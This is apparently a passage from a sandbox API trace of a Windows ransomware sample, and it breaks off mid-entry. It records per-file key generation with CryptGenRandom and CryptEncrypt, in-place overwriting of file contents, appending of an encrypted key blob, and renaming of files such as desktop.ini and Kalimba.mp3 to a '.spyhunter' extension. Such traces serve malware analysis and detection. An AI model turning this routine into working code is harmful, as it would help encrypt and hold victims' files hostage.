[0142.326] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef88 | out: pbBuffer=0x270ef88) returned 1 [0142.326] GetProcessHeap () returned 0x2c0000 [0142.326] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0142.326] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270ef80*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270ef80*=0x30) returned 1 [0142.326] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\." (normalized: "c:\\users\\public\\libraries\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.330] GetProcessHeap () returned 0x2c0000 [0142.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0142.330] GetProcessHeap () returned 0x2c0000 [0142.330] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f36fb8 | out: hHeap=0x2c0000) returned 1 [0142.340] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef80 | out: pbBuffer=0x270ef80) returned 1 [0142.340] GetProcessHeap () returned 0x2c0000 [0142.340] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0142.340] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270ef78*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270ef78*=0x30) returned 1 [0142.340] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\.." (normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.340] GetProcessHeap () returned 0x2c0000 [0142.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0142.340] GetProcessHeap () returned 0x2c0000 [0142.340] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30eb68 | out: hHeap=0x2c0000) returned 1 [0142.341] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef80 | out: pbBuffer=0x270ef80) returned 1 [0142.341] GetProcessHeap () returned 0x2c0000 [0142.341] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0142.341] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270ef78*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270ef78*=0x30) returned 1 [0142.341] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Favorites\\." (normalized: "c:\\users\\public\\favorites\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.341] GetProcessHeap () returned 0x2c0000 [0142.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0142.341] GetProcessHeap () returned 0x2c0000 [0142.341] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f36f30 | out: hHeap=0x2c0000) returned 1 [0142.342] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef78 | out: pbBuffer=0x270ef78) returned 1 [0142.342] GetProcessHeap () returned 0x2c0000 [0142.342] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0142.342] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270ef70*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270ef70*=0x30) returned 1 [0142.342] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.343] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini") returned 41 [0142.343] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.343] GetProcessHeap () returned 0x2c0000 [0142.343] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0142.343] ReadFile (in: hFile=0x178, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ef34, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270ef34*=0xae, lpOverlapped=0x0) returned 1 [0142.344] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffff52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.344] WriteFile (in: hFile=0x178, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x270ef34, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270ef34*=0xae, lpOverlapped=0x0) returned 1 [0142.344] GetProcessHeap () returned 0x2c0000 [0142.344] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0142.344] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.344] WriteFile (in: hFile=0x178, lpBuffer=0x270ef74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ef34, lpOverlapped=0x0 | out: lpBuffer=0x270ef74*, lpNumberOfBytesWritten=0x270ef34*=0x4, lpOverlapped=0x0) returned 1 [0142.344] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ef34, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x270ef34*=0x30, lpOverlapped=0x0) returned 1 [0142.344] CloseHandle (hObject=0x178) returned 1 [0142.344] GetProcessHeap () returned 0x2c0000 [0142.344] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.344] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini.spyhunter") returned 51 [0142.344] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini" (normalized: "c:\\users\\public\\downloads\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Downloads\\desktop.ini.spyhunter" (normalized: "c:\\users\\public\\downloads\\desktop.ini.spyhunter")) returned 1 [0142.346] GetProcessHeap () returned 0x2c0000 [0142.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.346] GetProcessHeap () returned 0x2c0000 [0142.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0142.346] GetProcessHeap () returned 0x2c0000 [0142.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0b3a8 | out: hHeap=0x2c0000) returned 1 [0142.346] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef70 | out: pbBuffer=0x270ef70) returned 1 [0142.346] GetProcessHeap () returned 0x2c0000 [0142.346] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0142.346] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270ef68*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270ef68*=0x30) returned 1 [0142.346] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\.." (normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.346] GetProcessHeap () returned 0x2c0000 [0142.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0142.346] GetProcessHeap () returned 0x2c0000 [0142.346] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ead8 | out: hHeap=0x2c0000) returned 1 [0142.347] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef70 | out: pbBuffer=0x270ef70) returned 1 [0142.347] GetProcessHeap () returned 0x2c0000 [0142.347] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0142.347] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x270ef68*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x270ef68*=0x30) returned 1 [0142.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Downloads\\." (normalized: "c:\\users\\public\\downloads\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.347] GetProcessHeap () returned 0x2c0000 [0142.347] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0142.347] GetProcessHeap () returned 0x2c0000 [0142.394] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f36ea8 | out: hHeap=0x2c0000) returned 1 [0142.394] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef68 | out: pbBuffer=0x270ef68) returned 1 [0142.394] GetProcessHeap () returned 0x2c0000 [0142.394] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0142.394] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ef60*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ef60*=0x30) returned 1 [0142.394] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.394] GetProcessHeap () returned 0x2c0000 [0142.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0142.395] GetProcessHeap () returned 0x2c0000 [0142.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f36c00 | out: hHeap=0x2c0000) returned 1 [0142.395] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef68 | out: pbBuffer=0x270ef68) returned 1 [0142.395] GetProcessHeap () returned 0x2c0000 [0142.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0142.395] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ef60*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ef60*=0x30) returned 1 [0142.395] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Videos\\." (normalized: "c:\\users\\default\\videos\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.395] GetProcessHeap () returned 0x2c0000 [0142.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0142.395] GetProcessHeap () returned 0x2c0000 [0142.395] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f36b78 | out: hHeap=0x2c0000) returned 1 [0142.397] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef60 | out: pbBuffer=0x270ef60) returned 1 [0142.397] GetProcessHeap () returned 0x2c0000 [0142.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0142.397] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ef58*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ef58*=0x30) returned 1 [0142.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\default\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.397] GetProcessHeap () returned 0x2c0000 [0142.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0142.397] GetProcessHeap () returned 0x2c0000 [0142.397] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffe368 | out: hHeap=0x2c0000) returned 1 [0142.397] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef58 | out: pbBuffer=0x270ef58) returned 1 [0142.397] GetProcessHeap () returned 0x2c0000 [0142.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0142.397] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ef50*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ef50*=0x30) returned 1 [0142.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.398] GetProcessHeap () returned 0x2c0000 [0142.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0142.398] GetProcessHeap () returned 0x2c0000 [0142.398] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5ed70 | out: hHeap=0x2c0000) returned 1 [0142.398] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef58 | out: pbBuffer=0x270ef58) returned 1 [0142.398] GetProcessHeap () returned 0x2c0000 [0142.398] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0142.398] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ef50*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ef50*=0x30) returned 1 [0142.398] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0142.399] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini") returned 41 [0142.399] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.399] GetProcessHeap () returned 0x2c0000 [0142.399] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0142.399] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ef14, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270ef14*=0x20c, lpOverlapped=0x0) returned 1 [0142.400] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffffdf4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.400] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x270ef14, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270ef14*=0x20c, lpOverlapped=0x0) returned 1 [0142.400] GetProcessHeap () returned 0x2c0000 [0142.400] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0142.400] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.400] WriteFile (in: hFile=0x178, lpBuffer=0x270ef54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ef14, lpOverlapped=0x0 | out: lpBuffer=0x270ef54*, lpNumberOfBytesWritten=0x270ef14*=0x4, lpOverlapped=0x0) returned 1 [0142.400] WriteFile (in: hFile=0x178, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ef14, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ef14*=0x30, lpOverlapped=0x0) returned 1 [0142.400] CloseHandle (hObject=0x178) returned 1 [0142.400] GetProcessHeap () returned 0x2c0000 [0142.400] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.400] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini.spyhunter") returned 51 [0142.400] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini.spyhunter" (normalized: "c:\\users\\default\\searches\\desktop.ini.spyhunter")) returned 1 [0142.401] GetProcessHeap () returned 0x2c0000 [0142.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.401] GetProcessHeap () returned 0x2c0000 [0142.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0142.401] GetProcessHeap () returned 0x2c0000 [0142.401] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d0b268 | out: hHeap=0x2c0000) returned 1 [0142.401] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef50 | out: pbBuffer=0x270ef50) returned 1 [0142.401] GetProcessHeap () returned 0x2c0000 [0142.401] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0142.401] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ef48*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ef48*=0x30) returned 1 [0142.401] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.402] GetProcessHeap () returned 0x2c0000 [0142.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0142.402] GetProcessHeap () returned 0x2c0000 [0142.402] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30e9b8 | out: hHeap=0x2c0000) returned 1 [0142.403] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef50 | out: pbBuffer=0x270ef50) returned 1 [0142.403] GetProcessHeap () returned 0x2c0000 [0142.403] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0142.403] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ef48*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ef48*=0x30) returned 1 [0142.403] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\." (normalized: "c:\\users\\default\\searches\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0142.403] GetProcessHeap () returned 0x2c0000 [0142.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0142.403] GetProcessHeap () returned 0x2c0000 [0142.403] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f36af0 | out: hHeap=0x2c0000) returned 1 [0142.404] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef48 | out: pbBuffer=0x270ef48) returned 1 [0142.404] GetProcessHeap () returned 0x2c0000 [0142.404] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0142.404] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ef40*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ef40*=0x30) returned 1 [0142.404] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini" (normalized: "c:\\users\\default\\saved games\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0142.444] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini") returned 44 [0142.444] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0142.444] GetProcessHeap () returned 0x2c0000 [0142.444] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0142.444] ReadFile (in: hFile=0x170, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ef04, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ef04*=0x11a, lpOverlapped=0x0) returned 1 [0142.445] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffee6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.445] WriteFile (in: hFile=0x170, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x270ef04, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ef04*=0x11a, lpOverlapped=0x0) returned 1 [0142.445] GetProcessHeap () returned 0x2c0000 [0142.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0142.445] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.445] WriteFile (in: hFile=0x170, lpBuffer=0x270ef44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ef04, lpOverlapped=0x0 | out: lpBuffer=0x270ef44*, lpNumberOfBytesWritten=0x270ef04*=0x4, lpOverlapped=0x0) returned 1 [0142.445] WriteFile (in: hFile=0x170, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ef04, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x270ef04*=0x30, lpOverlapped=0x0) returned 1 [0142.445] CloseHandle (hObject=0x170) returned 1 [0142.445] GetProcessHeap () returned 0x2c0000 [0142.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0142.446] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini.spyhunter") returned 54 [0142.446] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini" (normalized: "c:\\users\\default\\saved games\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini.spyhunter" (normalized: "c:\\users\\default\\saved games\\desktop.ini.spyhunter")) returned 1 [0142.446] GetProcessHeap () returned 0x2c0000 [0142.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0142.446] GetProcessHeap () returned 0x2c0000 [0142.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0142.446] GetProcessHeap () returned 0x2c0000 [0142.446] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33e260 | out: hHeap=0x2c0000) returned 1 [0142.446] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ef40 | out: pbBuffer=0x270ef40) returned 1 [0142.446] GetProcessHeap () returned 0x2c0000 [0142.446] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0142.446] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x270ef38*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x270ef38*=0x30) returned 1 [0142.447] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3" (normalized: "c:\\users\\public\\music\\sample music\\kalimba.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xac [0142.464] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Music\\Sample Music\\Kalimba.mp3") returned 50 [0142.464] StrStrW (lpFirst="Kalimba.mp3", lpSrch=".txt") returned 0x0 [0142.464] GetProcessHeap () returned 0x2c0000 [0142.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0142.464] ReadFile (in: hFile=0xac, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270eefc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270eefc*=0x2800, lpOverlapped=0x0) returned 1 [0142.494] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0142.494] WriteFile (in: hFile=0xac, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270eefc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270eefc*=0x2800, lpOverlapped=0x0) returned 1 [0142.494] GetProcessHeap () returned 0x2c0000 [0142.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0142.494] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0142.494] WriteFile (in: hFile=0xac, lpBuffer=0x270ef3c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270eefc, lpOverlapped=0x0 | out: lpBuffer=0x270ef3c*, lpNumberOfBytesWritten=0x270eefc*=0x4, lpOverlapped=0x0) returned 1 [0142.731] WriteFile (in: hFile=0xac, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270eefc, 